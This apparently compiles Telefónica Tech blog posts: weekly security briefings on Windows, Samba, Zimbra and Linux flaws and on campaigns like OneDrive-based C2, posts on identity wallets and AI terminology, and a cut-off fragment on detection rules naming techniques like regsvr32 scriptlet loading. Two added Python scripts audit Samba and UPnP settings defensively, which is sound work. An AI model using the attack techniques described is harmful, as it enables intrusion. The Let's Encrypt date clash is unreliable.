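On the constructed events the shell spawned by Explorer is reported at low severity, the same shell spawned by Word at high, and the scriptlet-loading regsvr32 at high, while the vendor installer registering its own DLL is not reported. The `reference` field carries the technique ID in the form that both the ATT&CK technique page and D3FEND’s ATT&CK lookup accept, so a finding can be taken straight into the step-4 defence review described in the post.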

Digital Identity Wallets against identity theft fraud

Alexandre Maravilla    8 February, 2022

Identity theft or impersonation is a type of fraud in which criminals manage to supplant the identity of the person being deceived, based on the theft of their personal information. There are particularly relevant cases such as the one described in this article in El País: “They impersonated me and spent 100,000 euros in my name. I’m still suffering the consequences”.

In this particular case, the victim lost his national identity card, or perhaps it was stolen deliberately, but either way it ended up in the hands of fraudsters. Identity theft based on a stolen ID card is a technique that is unfortunately on the rise, largely because since the advent of COVID-19 most transactions have become digital and are carried out remotely.

How to prevent identity theft fraud

The most effective suggestion and solution is to reduce the amount of personal information shared as much as possible. For example, when asked to send a scanned ID card, do so after partially redacting information that is not strictly necessary, such as the expiry date, the postal address or our photograph.

However, sometimes requests to send personal information go beyond the ID card and may ask for financial or tax data such as invoices, bank transactions or even tax returns. This type of request is common in banks to prevent money laundering, but it is also common for this personal data to be requested for procedures related to the evaluation of financial solvency, for example, by landlords in the case of rental housing.

Can we refuse to share this type of personal information? Current law requires the recipient of such personal data to process it in accordance with the European General Data Protection Regulation (GDPR), but the recipient is entitled to request it.

In the case of fraudsters, they try to trick victims by posing as fake landlords, fake sellers, or even lenders. All of this is done to collect personal information that allows them to impersonate and gain access to credit, open bank accounts from which to launder money (through mule accounts) or make fraudulent purchases.

Digital Identity Wallets to the rescue

An “ID Wallet” is a cryptographic application installed on our mobile devices that allows us to store and share credentials related to our identity and its attributes (see https://business.blogthinkbig.com/europes-new-digital-identity-sovereign-identity-wallets/). These applications allow us to verify our identity without sharing our ID card or, for example, to validate our financial solvency without sharing invoices, bank transactions or tax returns.

How do they work? By storing credentials linked to our identity that can be verified and validated by third parties. For example, we can store in the wallet our ID card together with financial information issued by our bank. When a landlord asks us to prove that we live in Spain, that we are over 18 and that we are solvent, we can share our identity credential (which is not the DNI itself) together with the financial solvency credential (which is not the tax return or the bank details). In this way we validate the conditions required by the landlord without needing to share any personal data that could be manipulated or used without our consent.

The underlying technology in this whole process is blockchain and ensures that the information stored in the wallet is accurate, and that the issuing authority is trustworthy. In this way the recipient of the information can validate its legitimacy.

A not-so-distant future

The European Union is already working on this type of solution and aims for all EU citizens to have access to this technology by 2024. In Spain, several initiatives are beginning to emerge, such as the Alicante ID project, which aims to create a local digital identity ecosystem, so that citizens, administrations and companies can exchange verifiable credentials stored in identity wallets.

The aim of all these projects is to return control of personal data to those to whom it belongs, the users themselves. Privacy in the processing of personal information increases security and prevents online fraud.

Cyber Security Weekly Briefing 29 January – 4 February

Telefónica Tech    4 February, 2022

Exploits that allow privilege elevation in Windows published

Security researchers have made public several exploits that leverage a known elevation of privilege vulnerability affecting all versions of Windows 10. The exploits rely specifically on CVE-2022-21882 (CVSSv3 7.0) which, in combination with a bypass of CVE-2021-1732 (CVSSv3 7.8), both already patched by Microsoft, could allow a threat actor to easily elevate their privileges in order to move laterally within the network, create new users or execute commands with high privileges. According to Microsoft, the vulnerability was discovered by a private researcher who shared a technical analysis of it shortly after the official Windows updates were released. In addition, several investigations have already confirmed that the published exploits are fully functional. It is worth noting that Microsoft’s January fixes caused multiple severe bugs in key system services that were subsequently fixed with out-of-band (OOB) patches, which may have led system administrators to wait for the February fixes, so it is estimated that, as of today, many devices may be vulnerable to these new exploits.

More info: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/

Critical vulnerability in Samba

Samba has released security updates to address three vulnerabilities that, if successfully exploited, could allow remote attackers to execute arbitrary code with the highest privileges on affected installations. The most severe, CVE-2021-44142 (CVSSv3 9.0), was reported by Orange Tsai of DEVCORE and affects all versions of Samba prior to 4.13.17. It is an out-of-bounds read/write vulnerability in the “vfs_fruit” VFS module, which provides support for Apple’s SMB clients. It should be noted that exploiting this vulnerability requires write access to a file’s extended attributes on a Samba share. According to the CERT Coordination Center (CERT/CC), the list of platforms affected by this vulnerability includes Red Hat, SUSE Linux and Ubuntu. Administrators can fix the flaw by installing versions 4.13.17, 4.14.12 or 4.15.5, or by applying the security patches released by the vendor. Samba has also provided a mitigation for administrators who cannot immediately install the latest versions: removing “fruit” from the “vfs objects” lines in the Samba configuration files. Finally, there are two other bugs of lower severity (CVE-2021-44141, CVSSv3 4.2, and CVE-2022-0336, CVSSv3 3.1).

All the details:https://www.samba.org/samba/history/security.html
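To apply the interim mitigation above across a fleet you first need to know which shares actually load vfs_fruit. The following is an added example, not Samba’s own code: a minimal smb.conf parser that reports the sections whose “vfs objects” list includes fruit, plus a rewrite that drops the module. SAMPLE_SMB_CONF is a constructed configuration; the share names and paths are invented.

```python
"""Find Samba shares that load vfs_fruit and apply the advisory's interim mitigation.

Added example, not Samba's own code. SAMPLE_SMB_CONF is a constructed smb.conf. The
real fix is upgrading to 4.13.17, 4.14.12 or 4.15.5; dropping "fruit" also removes
Apple-specific metadata support for macOS clients, so treat it as temporary.
"""
import re

SAMPLE_SMB_CONF = """\
[global]
   workgroup = EXAMPLE
   server role = standalone server

[timemachine]
   path = /srv/timemachine
   vfs objects = catia fruit streams_xattr
   fruit:time machine = yes

[public]
   path = /srv/public
   vfs objects = streams_xattr
"""

VFS_LINE = re.compile(r"^(\s*vfs\s+objects\s*=\s*)(.*)$", re.IGNORECASE)


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {normalised key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            key = re.sub(r"\s+", " ", key.strip().lower())
            sections[current][key] = value.strip()
    return sections


def shares_loading_fruit(conf):
    """Names of sections whose 'vfs objects' list includes the fruit module."""
    return [name for name, params in conf.items()
            if "fruit" in params.get("vfs objects", "").lower().split()]


def strip_fruit_module(text):
    """Rewrite smb.conf text with 'fruit' removed from every 'vfs objects' line.

    Leftover 'fruit:...' parameters are harmless once the module is not loaded.
    """
    out = []
    for line in text.splitlines():
        match = VFS_LINE.match(line)
        if match:
            modules = [m for m in match.group(2).split() if m.lower() != "fruit"]
            line = match.group(1) + " ".join(modules)
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("shares loading vfs_fruit:", shares_loading_fruit(parse_smb_conf(SAMPLE_SMB_CONF)))
    print(strip_fruit_module(SAMPLE_SMB_CONF))
```

Note that a “vfs objects” line in [global] applies to every share, so the parser reports [global] too if it loads fruit there.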

Campaign targeting senior executives via malicious OAuth applications

Researchers at Proofpoint have analysed a new campaign, active since January, which they have named OiVaVoii because of its use of malicious OAuth applications. The campaign uses compromised Office 365 tenants and a sophisticated combination of lures, including malicious OAuth applications and spear phishing. Through these techniques malicious actors can take control of corporate accounts, increasing the risk that the activity leads to data leaks, lateral movement, brand abuse, further phishing campaigns or malware distribution. The targets of this campaign are reportedly high-level executives, including CEOs, Managing Directors and Board members. Microsoft has blocked four of the fraudulent applications used, although new ones have been created, and Proofpoint notes that the activity is still ongoing. Potentially impacted companies should revoke permissions, remove the applications, delete any malicious mailbox rules added by the malicious actors and review any downloaded files.

All info: https://www.proofpoint.com/us/blog/cloud-security/oivavoii-active-malicious-hybrid-cloud-threats-campaign

“UPnProxy”: thousands of routers vulnerable to UPnP attacks

Researchers at Akamai have detected a malicious campaign called “Eternal Silence” that abuses the Universal Plug and Play (UPnP) protocol to use thousands of routers as proxies, thereby hiding the real location of the malicious actors. UPnP is present in almost all current routers and allows automatic port forwarding for access to different services and/or software, which makes it easy for a potential attacker to add UPnP port forwarding entries through a device’s exposed WAN connection. In particular, analysts point out that the attacks attempt to expose TCP ports 139 and 445 on devices connected to the targeted router, in order to subsequently exploit already known vulnerabilities such as EternalBlue (CVE-2017-0144) and EternalRed (CVE-2017-7494) on unpatched Windows and Linux systems, respectively. Akamai refers to this attack technique as “UPnProxy” and, according to its research, of the more than 3 million UPnP routers scanned online, 277,000 are reportedly vulnerable to UPnProxy and more than 45,000 have already been infected. Additionally, Akamai highlights that these techniques are almost unnoticeable to victims, so it recommends auditing NAT table entries and, if a compromise is detected, rebooting the device or updating its firmware.

Discover more: https://www.akamai.com/content/dam/site/en/documents/research-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf
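Akamai’s recommendation is to audit the NAT table, which on a UPnP router means walking the WANIPConnection port mappings. The following is an added example, not Akamai’s code: it parses GetGenericPortMappingEntry SOAP responses of the kind that service returns and flags the two shapes described above, a mapping whose internal client is not on the LAN (the router acting as a proxy) and a mapping that exposes port 139 or 445. The responses, addresses and the 192.168.1.0/24 subnet are constructed assumptions; in practice you would fetch the entries from the router’s control URL with a UPnP client.

```python
"""Audit UPnP IGD port mappings for the UPnProxy / Eternal Silence pattern.

Added example, not code from Akamai or the briefing. The SOAP bodies below are
constructed GetGenericPortMappingEntry responses; on a real router they would be
obtained by calling the WANIPConnection service for index 0, 1, 2, ... until it
returns an error.
"""
import ipaddress
import xml.etree.ElementTree as ET

# Assumed local subnet; change to the LAN actually behind the router.
LAN = ipaddress.ip_network("192.168.1.0/24")
SMB_PORTS = {139, 445}  # ports the campaign tries to expose


def _entry(ext_port, proto, int_port, client, desc):
    """Build a constructed GetGenericPortMappingEntryResponse body."""
    return (
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:GetGenericPortMappingEntryResponse '
        'xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        f"<NewRemoteHost></NewRemoteHost><NewExternalPort>{ext_port}</NewExternalPort>"
        f"<NewProtocol>{proto}</NewProtocol><NewInternalPort>{int_port}</NewInternalPort>"
        f"<NewInternalClient>{client}</NewInternalClient><NewEnabled>1</NewEnabled>"
        f"<NewPortMappingDescription>{desc}</NewPortMappingDescription>"
        "<NewLeaseDuration>0</NewLeaseDuration>"
        "</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>"
    )


# Constructed table: one ordinary LAN mapping, one SMB exposure, one proxy hop.
SAMPLE_RESPONSES = [
    _entry(25565, "TCP", 25565, "192.168.1.50", "game server"),
    _entry(44001, "TCP", 445, "192.168.1.20", "tmp"),
    _entry(8080, "TCP", 80, "203.0.113.9", "tmp"),
]


def parse_mapping(xml_text):
    """Extract the fields of one port-mapping entry into a dict."""
    root = ET.fromstring(xml_text)

    def text(tag):
        el = next(root.iter(tag), None)
        if el is None or el.text is None:
            return ""
        return el.text

    return {
        "external_port": int(text("NewExternalPort")),
        "protocol": text("NewProtocol"),
        "internal_port": int(text("NewInternalPort")),
        "internal_client": text("NewInternalClient"),
        "description": text("NewPortMappingDescription"),
    }


def audit(mappings, lan=LAN):
    """Return (mapping, reasons) for every entry that looks like UPnProxy abuse."""
    findings = []
    for m in mappings:
        reasons = []
        client = ipaddress.ip_address(m["internal_client"])
        if client not in lan:
            reasons.append("internal client is outside the LAN (router used as a proxy)")
        if m["internal_port"] in SMB_PORTS:
            reasons.append("exposes an SMB port (139/445) to the Internet")
        if reasons:
            findings.append((m, reasons))
    return findings


if __name__ == "__main__":
    for mapping, reasons in audit([parse_mapping(r) for r in SAMPLE_RESPONSES]):
        print(f"{mapping['external_port']} -> {mapping['internal_client']}:"
              f"{mapping['internal_port']}: " + "; ".join(reasons))
```

A legitimate UPnP mapping always points at a host inside the router’s own LAN, so the “outside the LAN” check alone catches the proxy injections; the SMB check covers the second stage the campaign prepares for, whether or not the client is local.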

0-day vulnerability in Zimbra

Researchers at Volexity have discovered a 0-day vulnerability in the Zimbra collaborative email platform that is being actively exploited against government organisations and media outlets in Europe. According to the published report, the exploitation campaign started last December with phishing emails containing malicious links under the lure of interview requests or invitations to charity auctions. When the malicious link is clicked, the attackers’ infrastructure redirects the victim to a page hosted on the target organisation’s Zimbra webmail host with a specific URI format that, if the user is logged in, exploits an XSS (cross-site scripting) vulnerability allowing the execution of arbitrary JavaScript code in the context of the logged-in Zimbra session, as well as leaking cookies to gain persistent mailbox access, send further phishing to other users or download malware from trusted websites. Volexity attributes this exploitation campaign to a previously unknown threat actor it calls “TEMP_Heretic”, whose origin could be Chinese. Additionally, the research confirms that the most recent versions of Zimbra (8.8.15 P29 and P30) are vulnerable, although tests conducted on version 9.0.0 indicate that it is likely unaffected, so upgrading is recommended where possible.

All the details: https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/

Artificial Intelligence or Cognitive Intelligence? The buzz words of business

Paloma Recuero de los Santos    1 February, 2022

(Original post in Spanish: ¿Inteligencia artificial o cognitiva?)

Artificial Intelligence has become the biggest buzzword of the last 5 years, with various spin-offs including “Cognitive Intelligence”, “Smart Technologies” and “Predictive Technologies”. The often negative associations that accompany the idea of Artificial Intelligence mean some companies are shying away from declaring themselves AI pioneers and are instead creating their own buzzwords. But what is the real difference between these ideas, and how do AI companies deal with possible negative connotations?

What is AI?

The Encyclopædia Britannica defines the concept of Artificial Intelligence as “the ability of a digital computer or computer-controlled robots to perform tasks commonly associated with intelligent beings. The term is frequently applied to the project of developing systems endowed with the intellectual processes characteristic of humans, such as the ability to reason, discover meaning, generalize, or learn from past experience”. The problem with the term Artificial is that it carries connotations of a lack of authenticity, of something robotic and unnatural, when its aim is quite the opposite.

To summarize this rather lengthy explanation in fewer words, one could simply describe AI as creating a computer that can solve complex problems as a human would. It is a vital part of economic sectors such as Information technologies, Health, Life Sciences, Data Analysis, Digital Transformation, Security and now in the consumer sector with the development of smart homes etc.

Cognitive Intelligence and Machine Learning

Cognitive Intelligence is an important part of AI that encompasses the technologies and tools allowing our apps, websites and bots to see, hear, speak, understand and interpret a user’s needs in a natural way. That is to say, they are the applications of AI that allow machines to learn their users’ language so that the users don’t have to learn the language of machines. AI is a much wider concept that includes technologies and innovations such as robotics, Machine Learning, Deep Learning, neural networks, NLP, etc.

Machine learning is one branch of Artificial Intelligence that allows researchers, data scientists, data engineers and analysts to build algorithms that learn and can make “data-driven” predictions. Instead of following a series of rules and instructions, these algorithms are trained to identify patterns in large quantities of data. Deep Learning takes this idea one step further and processes the information in layers, so that the result obtained in one layer becomes the input for the next.

So, if AI is so important, why is the term often tiptoed around?

The origin of negative connotations for AI

Firstly, it seems to have become a “worn-out” word. It has been used so widely that the whole world seems to know about (and have an opinion on) the subject! This widespread use has been accompanied by a lack of information: many people can only base their understanding on what Hollywood has taught them, namely that AI is limited to robots and Strong AI. Others think they are talking about AI when, in reality, they are talking about Machine Learning.

Secondly, there is the fact that Artificial Intelligence is not a new concept, meaning misjudgements have formed over many decades; in fact, it has existed since 1956. Over these years there have been different waves (such as the introduction of expert systems in the 80s and the explosion of the internet in the 90s). In each period, expectations have been greater than reality and there have been “troughs of disillusionment”, the third phase of Gartner’s “Hype Cycle”.

Figure 1: Gartner Curve. (From IOTpreneur, CC BY-SA 4.0)

We currently find ourselves in a period of high expectations with respect to AI. Big companies are promising innovation beyond what we could have imagined 20 years ago. Some technological leaders talk about the dangers and impact that automation, robotics and AI might have on our lives and future jobs. Despite this, each day we are seeing more and more technologies that make our lives easier. These advancements, that help people see the reality of the technology may help to reduce the “baggage” of negative connotations surrounding the future of AI.

What areas does AI encompass?

AI is an ecosystem in which we can include technologies such as data mining, natural language processing (NLP), Deep Learning, Predictive and Prescriptive Analytics and many more. In this ecosystem we also find technologies that regularly assist us in our daily lives, such as the recommendation systems on which Netflix and Airbnb are based.

All of these technologies are characterized by generating data which, if analyzed correctly, can offer great value and understanding. Due to this, one can say that artificial intelligence lies at the convergence of all these solutions.

Additionally, AI is closely linked to the four pillars of innovation and digital transformation (cloud computing, mobility, social analytics and Big Data), as it powers some of the main accelerators of this transformation, including Cloud Computing, Cognitive Systems, the Internet of Things (IoT), Cybersecurity and Big Data technologies.

Digital transformation pillars

The technology sector is transforming into a sector of understanding. In order to take anything away from this understanding it is important to have technologies and “real-life” applications that are deeply connected. This is what we call the “digital economy”. As mentioned earlier, this transformation is based on four fundamental pillars:

  • Cloud computing
  • Mobility
  • Social Analytics
  • Big Data Analytics

These technologies and innovations are the true driving forces behind a digital transformation and they are so closely tied with AI that they sometimes get confused with AI itself. These four pillars support the “accelerators” of innovation.

The main accelerators are:

  • Cognitive services
  • Cybersecurity
  • IoT
  • Big Data

Cognitive services

All of these technologies are ever-present in our daily lives. Cognitive services aim to imitate rational human processes. They analyze large amounts of data created by connected systems and offer tools with diagnostic, predictive and prescriptive capabilities, capable of observing, learning and offering insights. They are closely oriented towards context and human interaction. The challenge for Artificial Intelligence here is to design the technology so that people can interact with it naturally. This involves developing applications with “human behavior”, such as:

  • Listening and speaking, or rather the ability to turn audio to text and text to audio
  • Natural Language Processing (NLP). Text is not just a combination of keywords, a computer needs to understand grammatical and contextual connections too
  • Understanding emotions and feelings (“sentiment analysis”). To create empathetic systems capable of understanding the emotional state of a person and to make decisions based on this.
  • Image recognition. This consists of finding and identifying objects in an image or video sequence. It is a simple task for humans, but a real challenge for machines.

Cybersecurity

Cybersecurity is also moving towards a more holistic focus, one that considers its environment and a more human dimension. Above all, it is becoming more proactive. Rather than waiting for a cyber-attack to happen, the key is in prediction and prevention. Now, AI can be used to detect patterns in the data and take action when alerts arise.

Internet of Things and Big Data

What about the Internet of Things and Big Data? In this case, the amount of data that is being created is clear, as is the fact that it is happening rapidly and often in unstructured forms. This can include data from IoT sensors, social networks, text files, images, videos and sound. Now AI tools such as data mining, machine learning and NLP mean that it is possible to turn this data into useful information.

Artificial Intelligence is a very broad term that encompasses many processes and technologies which can be applied in various industries. Companies must be able to explain simply the type of AI they are incorporating in order to dispel the confusion surrounding the terms, which will make it a more accessible technology.

Cyber Security Weekly Briefing 22-28 January

Telefónica Tech    28 January, 2022

New vulnerabilities in Linux

Two new high-risk vulnerabilities have recently been disclosed that reportedly affect Linux systems. If exploited, they could allow privilege escalation on the vulnerable system.

  • CVE-2021-4034 (PwnKit): Researchers at Qualys have discovered a memory corruption flaw in polkit’s pkexec program that could allow a local attacker to escalate privileges on a vulnerable system and obtain root. Hours after the disclosure of the Qualys article, the first proof-of-concept (PoC) exploiting this flaw was made public. Qualys recommends applying the available patches that the Polkit authors have published on GitLab.
  • CVE-2022-0185: A buffer overflow vulnerability in the Linux kernel that could allow an attacker to escape from Kubernetes containers and take control of the node; the CAP_SYS_ADMIN capability must be enabled as a prerequisite. The researchers highlight that exploitation of this flaw is straightforward, so they recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has said it will publish the exploit code in the coming weeks on its GitHub repository.

More info: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

Let’s Encrypt SSL/TLS certificates revoked due to implementation error

Let’s Encrypt has announced in a statement that it will revoke certain SSL/TLS certificates on January 28th due to two irregularities in the implementation of the validation method. According to the statement, this will only affect certificates that were issued and validated using the TLS-ALPN-01 challenge before February 26th at 00:48 UTC, when the implementation error was corrected. They also indicate that this will only affect less than 1% of the certificates. Let’s Encrypt will communicate to affected users the guidelines they will have to follow to renew their certificates. It should be noted that this is not the first time Let’s Encrypt has faced a problem of this kind, as in October 2021 the DST Root CA X3 root certificates expired.

All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450

Espionage campaign using OneDrive as C2

Researchers at Trellix have published details of a multi-phased espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but the preparation of the infrastructure could date back as far as June. The initial access vector would be an Excel document, possibly sent by email, which exploits a remote code execution vulnerability in MSHTML (CVE-2021-40444), fixed by Microsoft in its September update bulletin. This exploit allows the deployment of malware known as Graphite, which uses the Microsoft Graph API to employ OneDrive as a Command & Control server. Once the connection to the C2 is established, Empire, an open-source post-exploitation framework widely used for illicit purposes, is downloaded. Given the multiple stages of the infection chain, which facilitate evasion, and the use of new techniques such as OneDrive as C2 so that all connections go to legitimate Microsoft domains, this can be considered a highly sophisticated campaign. Based on the targets, researchers point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit), of Russian origin.

All info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html

Apple fixes new 0-day exploit used to breach iOS devices

Apple has released new security updates for iOS 15.3 and iPadOS 15.3, as well as macOS Monterey 12.2, in which it has fixed two 0-day vulnerabilities.

  • The first of the flaws, identified as CVE-2022-22587, is a memory corruption flaw in the IOMobileFrameBuffer that affects iOS, iPadOS and macOS Monterey. Successful exploitation of this vulnerability could allow arbitrary code execution with kernel privileges on compromised devices. Apple highlights that the flaw is being actively exploited.
  • The second 0-day, a flaw in Safari WebKit on iOS and iPadOS, would allow websites to track browsing activity and user identity in real time. This vulnerability, classified as CVE-2022-22594, was first discovered by Martin Bajanik of FingerprintJS on November 28th, but was only published on January 14th and fixed in this update.

Discover more: https://support.apple.com/en-us/HT213053

TrickBot strengthens protections to evade detection and analysis

IBM Trusteer researchers have analysed recent TrickBot malware campaigns in which the operators behind the trojan have added extra layers of protection to their web injections to avoid detection and analysis. These code injections are used in real time when a user with an infected device tries to access their bank account; they are designed to intercept and modify information leaving the browser before it reaches the bank’s server. Most of the samples in which these new capabilities have been detected were used in bank fraud, one of TrickBot’s main activities. The updates include a new server-side injection mechanism, encrypted communications with the C2 (Command & Control), an anti-debugging feature and new ways of obfuscating and hiding the injected code. Separately, security researchers have reported that the operators of Emotet, malware that infects the device first and then distributes other malware such as TrickBot in a second phase, have also improved their evasion techniques by using hexadecimal and octal IP addresses, reportedly using the same webshell provider as TR does with Qakbot or Squirrelwaffle. They have identified up to 138 sites compromised by this malware.

All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/